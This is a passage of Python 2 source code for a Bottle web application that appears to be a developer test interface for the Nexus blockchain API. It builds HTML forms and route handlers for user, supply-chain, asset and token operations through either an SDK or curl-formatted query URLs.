"users-list-notifications" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_notifications).format(h, genesis, page, limit, f) o += "</td></tr>" o 
+= "<tr><td>" h = "users-list-items" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_items).format(h, genesis, page, limit, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-assets" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_assets).format(h, genesis, page, limit, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-tokens" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_tokens).format(h, genesis, page, limit, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-accounts" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_accounts).format(h, genesis, page, limit, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/users-create-user', method="post") def do_users_create_user(): username = bottle.request.forms.get("username") password = bottle.request.forms.get("password") pin = bottle.request.forms.get("pin") if (no_parms(username, password, pin)): m = red("users/create/user needs more input parameters") return(show(m)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init(username, password, pin) output = sdk.nexus_users_create_user() else: output = curl(users_create_user.format("", username, password, pin, "")) #endif output = json.dumps(output) return(show(output)) #enddef @bottle.route('/users-login-user', method="post") def 
do_users_login_user(): global contexts global nexus_api_last_username, nexus_sdk_last_username username = bottle.request.forms.get("username") password = bottle.request.forms.get("password") pin = bottle.request.forms.get("pin") if (no_parms(username, password, pin)): m = red("users/login/user needs more input parameters") return(show(m)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init(username, password, pin) output = sdk.nexus_users_login_user() sid, genid = [sdk.session_id, sdk.genesis_id] contexts[sid] = sdk if (output.has_key("error") == False): nexus_sdk_last_username = username #endif else: output = curl(users_login_user.format("", username, password, pin, "")) sid = output["result"]["session"] if output.has_key("result") else "" genid = output["result"]["genesis"] if output.has_key("result") else "" if (output.has_key("error") == False): nexus_api_last_username = username #endif #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/users-logout-user', method="post") def do_users_logout_user(): session = bottle.request.forms.get("session") if (no_parms(session)): m = red("users/logout/user needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_users_logout_user() genid = sdk.genesis_id else: output = curl(users_logout_user.format("", session, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/users-lock-user', method="post") def do_users_lock_user(): session = bottle.request.forms.get("session") if (no_parms(session)): m = red("users/lock/user needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if 
(sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_users_lock_user() genid = sdk.genesis_id else: output = curl(users_lock_user.format("", session, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/users-unlock-user', method="post") def do_users_unlock_user(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") if (no_parms(pin, session)): m = red("users/unlock/user needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_users_unlock_user() genid = sdk.genesis_id else: output = curl(users_unlock_user.format("", session, pin, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/users-list-transactions', method="post") @bottle.route('/users-list-transactions/<sid>', method="post") def do_users_list_transactions(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") verbose = bottle.request.forms.get("verbose") if (no_parms(genesis, page, limit, verbose)): m = red("users/list/transactions needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_transactions_by_genesis(page, limit, verbose) else: output = curl(users_list_transactions.format("", genesis, page, limit, verbose, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-notifications', method="post") @bottle.route('/users-list-notifications/<sid>', method="post") def 
do_users_list_notifications(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/notifications needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_notifications_by_genesis(page, limit) else: output= curl(users_list_notifications.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-items', method="post") @bottle.route('/users-list-items/<sid>', method="post") def do_users_list_items(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/items needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_items_by_genesis(page, limit) else: output= curl(users_list_items.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-assets', method="post") @bottle.route('/users-list-assets/<sid>', method="post") def do_users_list_assets(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/assets needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output 
= sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_assets_by_genesis(page, limit) else: output= curl(users_list_assets.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-tokens', method="post") @bottle.route('/users-list-tokens/<sid>', method="post") def do_users_list_tokens(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/tokens needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_tokens_by_genesis(page, limit) else: output= curl(users_list_tokens.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-accounts', method="post") @bottle.route('/users-list-accounts/<sid>', method="post") def do_users_list_accounts(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/accounts needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_accounts_by_genesis(page, limit) else: output= curl(users_list_accounts.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef #------------------------------------------------------------------------------ # # build_supply_html # supply_create_item = \ 
'{}supply/create/item?pin={}&session={}&name={}&data={}{}' supply_get_item_name = '{}supply/get/item?session={}&name={}{}' supply_get_item_address = '{}supply/get/item?session={}&address={}{}' supply_update_item = \ '{}supply/update/item?pin={}&session={}&address={}&data={}{}' supply_transfer_item = ('{}supply/transfer/item?pin={}&session={}' + \ '&address={}&destination={}{}') supply_claim_item = '{}supply/claim/item?pin={}&session={}&txid={}{}' supply_list_item_history_name = \ '{}supply/list/item/history?session={}&name={}{}' supply_list_item_history_address = \ '{}supply/list/item/history?session={}&address={}{}' def build_supply_html(sid, genid, o): f = form_footer o += "<br><b>Supply Chain API</b><br><br><table>" o += "<tr><td>" h = "supply-get-item-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(supply_get_item_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "supply-get-item-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(supply_get_item_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("supply-create-item") pin = form_parm.format("pin", "") name = form_parm.format("name", "") data = form_parm.format("data", "") session = form_parm.format("session", sid) o += hl(supply_create_item).format(h, pin, session, name, data, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("supply-update-item") pin = form_parm.format("pin", "") data = form_parm.format("data", "") session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(supply_update_item).format(h, pin, session, address, data, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("supply-transfer-item") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) address = form_parm.format("address", "") d = 
form_parm.format("destination", "") o += hl(supply_transfer_item).format(h, pin, session, address, d, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("supply-claim-item") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) txid = form_parm.format("txid", "") o += hl(supply_claim_item).format(h, pin, session, txid, f) o += "</td></tr>" o += "<tr><td>" h = "supply-list-item-history-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(supply_list_item_history_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "supply-list-item-history-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(supply_list_item_history_address).format(h, session, address, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/supply-create-item', method="post") def do_supply_create_item(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") data = bottle.request.forms.get("data") if (no_parms(pin, session, data)): m = red("supply/create/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_create_item(name, data) genid = sdk.genesis_id else: output = curl(supply_create_item.format("", pin, session, name, data, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-get-item-name', method="post") def do_supply_get_item_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("supply/get/item needs more input parameters") return(show(m, session)) #endif 
action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_get_item_by_name(name) genid = sdk.genesis_id else: output = curl(supply_get_item_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-get-item-address', method="post") def do_supply_get_item_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("supply/get/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_get_item_by_address(address) genid = sdk.genesis_id else: output = curl(supply_get_item_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-update-item', method="post") def do_supply_update_item(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") data = bottle.request.forms.get("data") if (no_parms(pin, session, address, data)): m = red("supply/update/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_update_item_by_address(address, data) genid = sdk.genesis_id else: output = curl(supply_update_item.format("", pin, session, address, data, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-transfer-item', method="post") def 
do_supply_transfer_item(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") dest = bottle.request.forms.get("destination") if (no_parms(pin, session, address, dest)): m = red("supply/transfer/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_transfer_item_by_address(address, dest) genid = sdk.genesis_id else: output = curl(supply_transfer_item.format("", pin, session, address, dest, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-claim-item', method="post") def do_supply_claim_item(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") txid = bottle.request.forms.get("txid") if (no_parms(pin, session, txid)): m = red("supply/claim/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_claim_item(txid) genid = sdk.genesis_id else: output = curl(supply_claim_item.format("", pin, session, txid, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-list-item-history-name', method="post") def do_supply_list_item_history_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("supply/list/item/history needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = 
sdk.nexus_supply_list_item_history_by_name(name) genid = sdk.genesis_id else: output = curl(supply_list_item_history_name.format("", session, name, "")) genid = "" #endif output = format_transactions(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-list-item-history-address', method="post") def do_supply_list_item_history_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("supply/list/item/history needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_list_item_history_by_address(address) genid = sdk.genesis_id else: output = curl(supply_list_item_history_address.format("", session, address, "")) genid = "" #endif output = format_transactions(output) return(show(output, session, genid)) #enddef #------------------------------------------------------------------------------ # # build_assets_html # assets_create_asset = \ '{}assets/create/asset?pin={}&session={}&name={}&format=raw&data={}{}' assets_get_asset_name = '{}assets/get/asset?session={}&name={}{}' assets_get_asset_address = '{}assets/get/asset?session={}&address={}{}' assets_update_asset = \ '{}assets/update/asset?pin={}&session={}&address={}&data={}{}' assets_transfer_asset = \ '{}assets/transfer/asset?pin={}&session={}&address={}&destination={}{}' assets_claim_asset = '{}assets/claim/asset?pin={}&session={}&txid={}{}' assets_tokenize_asset = \ '{}assets/tokenize/asset?pin={}&session={}&token_name={}&asset_name={}{}' assets_list_asset_history_name = \ '{}assets/list/asset/history?session={}&name={}{}' assets_list_asset_history_address = \ '{}assets/list/asset/history?session={}&address={}{}' def build_assets_html(sid, genid, o): f = form_footer o += "<br><b>Assets API</b><br><br><table>" o += 
"<tr><td>" h = "assets-get-asset-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(assets_get_asset_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "assets-get-asset-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(assets_get_asset_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-create-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) data = form_parm.format("data", "") name = form_parm.format("name", "") o += hl(assets_create_asset).format(h, pin, session, name, data, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-update-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) data = form_parm.format("data", "") address = form_parm.format("address", sid) o += hl(assets_update_asset).format(h, pin, session, data, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-transfer-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) address = form_parm.format("address", "") d = form_parm.format("destination", "") o += hl(assets_transfer_asset).format(h, pin, session, address, d, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-claim-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) txid = form_parm.format("txid", "") o += hl(assets_claim_asset).format(h, pin, session, txid, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-tokenize-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) token_name = form_parm.format("token_name", "") asset_name = form_parm.format("asset_name", "") o += hl(assets_tokenize_asset).format(h, pin, session, token_name, asset_name, f) o += "</td></tr>" o += "<tr><td>" h = 
"assets-list-asset-history-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(assets_list_asset_history_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "assets-list-asset-history-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(assets_list_asset_history_address).format(h, session, address, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/assets-create-asset', method="post") def do_assets_create_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") data = bottle.request.forms.get("data") if (no_parms(pin, session, name, data)): m = red("assets/create/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_create_asset(name, data) genid = sdk.genesis_id else: output = curl(assets_create_asset.format("", pin, session, name, data, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-update-asset', method="post") def do_assets_update_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") data = bottle.request.forms.get("data") if (no_parms(pin, session, address, data)): m = red("assets/update/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_update_asset_by_address(address, data) genid = sdk.genesis_id else: output = 
curl(assets_update_asset.format("", pin, session, address, data, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-get-asset-name', method="post") def do_assets_get_asset_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("assets/get/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_get_asset_by_name(name) genid = sdk.genesis_id else: output = curl(assets_get_asset_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-get-asset-address', method="post") def do_assets_get_asset_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("assets/get/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_get_asset_by_address(address) genid = sdk.genesis_id else: output = curl(assets_get_asset_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-transfer-asset', method="post") def do_assets_transfer_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") dest = bottle.request.forms.get("destination") if (no_parms(pin, session, address, dest)): m = red("assets/transfer/asset needs more input parameters") return(show(m, session)) #endif action = 
bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_transfer_asset_by_address(address, dest) genid = sdk.genesis_id else: output = curl(assets_transfer_asset.format("", pin, session, address, dest, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-claim-asset', method="post") def do_assets_claim_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") txid = bottle.request.forms.get("txid") if (no_parms(session, txid)): m = red("assets/claim/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_claim_asset(txid) genid = sdk.genesis_id else: output = curl(assets_claim_asset.format("", pin, session, txid, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-tokenize-asset', method="post") def do_assets_tokenize_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") token_name = bottle.request.forms.get("token_name") asset_name = bottle.request.forms.get("asset_name") if (no_parms(pin, session, token_name, asset_name)): m = red("assets/tokenize/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_tokenize_asset_by_name(asset_name, token_name) genid = sdk.genesis_id else: output = curl(assets_tokenize_asset.format("", pin, session, token_name, asset_name, "")) genid = "" #endif output = json.dumps(output) return(show(output, 
session, genid)) #enddef @bottle.route('/assets-list-asset-history-name', method="post") def do_assets_list_asset_history_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("assets/list/asset/history needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_list_asset_history_by_name(name) genid = sdk.genesis_id else: output = curl(assets_list_asset_history_name.format("", session, name, "")) genid = "" #endif output = format_transactions(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-list-asset-history-address', method="post") def do_assets_list_asset_history_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("assets/list/asset/history needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_list_asset_history_by_address(address) genid = sdk.genesis_id else: output = curl(assets_list_asset_history_address.format("", session, address, "")) genid = "" #endif output = format_transactions(output) return(show(output, session, genid)) #enddef #------------------------------------------------------------------------------ # # build_accounts_html # tokens_create_token = \ '{}tokens/create/token?pin={}&session={}&name={}&supply={}&decimals={}{}' tokens_create_account = \ '{}tokens/create/account?pin={}&session={}&name={}&token_name={}{}' tokens_get_token_name = '{}tokens/get/token?session={}&name={}{}' tokens_get_token_address = '{}tokens/get/token?session={}&address={}{}' 
tokens_get_account_name = '{}tokens/get/account?session={}&name={}{}' tokens_get_account_address = '{}tokens/get/account?session={}&address={}{}' tokens_debit_token = ('{}tokens/debit/token?pin={}&session={}&name={}' + \ '&name_to={}&amount={}{}') tokens_credit_token = ('{}tokens/credit/token?pin={}&session={}&name={}' + \ '&amount={}&txid={}{}') tokens_debit_account = ('{}tokens/debit/account?pin={}&session={}' + \ '&amount={}&name={}&name_to={}{}') tokens_credit_account = ('{}tokens/credit/account?pin={}&session={}' + \ '&txid={}&amount={}&name={}&name_proof={}{}') def build_tokens_html(sid, genid, o): f = form_footer o += "<br><b>Tokens API</b><br><br><table>" o += "<tr><td>" h = "tokens-get-token-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(tokens_get_token_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "tokens-get-token-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(tokens_get_token_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-create-token") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) name = form_parm.format("name", "") supply = form_parm.format("supply", "") d = form_parm.format("decimals", "2") o += hl(tokens_create_token).format(h, pin, session, name, supply, d, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-debit-token") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) amount = form_parm.format("amount", "") name = form_parm.format("name", "") name_to = form_parm.format("name_to", "") o += hl(tokens_debit_token).format(h, pin, session, name, name_to, amount, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-credit-token") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) name = 
form_parm.format("name", "") amount = form_parm.format("amount", "") txid = form_parm.format("txid", "") o += hl(tokens_credit_token).format(h, pin, session, name, amount, txid, f) o += "</td></tr>" o += "<tr><td>" h = "tokens-get-account-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(tokens_get_account_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "tokens-get-account-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(tokens_get_account_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-create-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) name = form_parm.format("name", "") token_name = form_parm.format("token_name", "") o += hl(tokens_create_account).format(h, pin, session, name, token_name, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-debit-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) amount = form_parm.format("amount", "") name = form_parm.format("name", "") name_to = form_parm.format("name_to", "") o += hl(tokens_debit_account).format(h, pin, session, amount, name, name_to, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-credit-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) txid = form_parm.format("txid", "") amount = form_parm.format("amount", "") name = form_parm.format("name", "") proof = form_parm.format("name_proof", "") o += hl(tokens_credit_account).format(h, pin, session, txid, amount, name, proof, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/tokens-create-token', method="post") def do_tokens_create_token(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = 
bottle.request.forms.get("name") supply = bottle.request.forms.get("supply") decimals = bottle.request.forms.get("decimals") if (no_parms(pin, session, name, supply, decimals)): m = red("tokens/create/token needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_create_token(name, supply, decimals) genid = sdk.genesis_id else: output = curl(tokens_create_token.format("", pin, session, name, supply, decimals, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-create-account', method="post") def do_tokens_create_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") token_name = bottle.request.forms.get("token_name") if (no_parms(pin, session, name, token_name)): m = red("tokens/create/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_create_account(name, token_name) genid = sdk.genesis_id else: output = curl(tokens_create_account.format("", pin, session, name, token_name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-get-token-name', method="post") def do_tokens_get_token_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("tokens/get/token needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): 
